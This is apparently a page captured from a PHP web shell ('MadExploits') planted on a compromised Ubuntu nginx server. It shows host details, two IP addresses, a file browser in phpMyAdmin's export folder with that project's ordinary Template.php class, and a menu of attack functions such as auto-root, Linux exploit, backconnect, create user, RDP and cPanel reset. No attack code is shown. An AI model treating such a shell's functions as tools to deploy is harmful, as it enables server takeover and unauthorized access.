Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.159
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
phpmyadmin /
libraries /
classes /
Export /
[ HOME SHELL ]
Name
Size
Permission
Action
Options.php
8.31
KB
-rw-r--r--
Template.php
1.31
KB
-rw-r--r--
TemplateModel.php
4.34
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Template.php
<?php declare(strict_types=1); namespace PhpMyAdmin\Export; /** @psalm-immutable */ final class Template { /** @var int */ private $id; /** @var string */ private $username; /** @var string */ private $exportType; /** @var string */ private $name; /** @var string JSON */ private $data; private function __construct(int $id, string $username, string $exportType, string $name, string $data) { $this->id = $id; $this->username = $username; $this->exportType = $exportType; $this->name = $name; $this->data = $data; } /** @param array<string, mixed> $state */ public static function fromArray(array $state): self { return new self( $state['id'] ?? 0, $state['username'], $state['exportType'] ?? '', $state['name'] ?? '', $state['data'] ); } public function getId(): int { return $this->id; } public function getUsername(): string { return $this->username; } public function getExportType(): string { return $this->exportType; } public function getName(): string { return $this->name; } public function getData(): string { return $this->data; } }
Close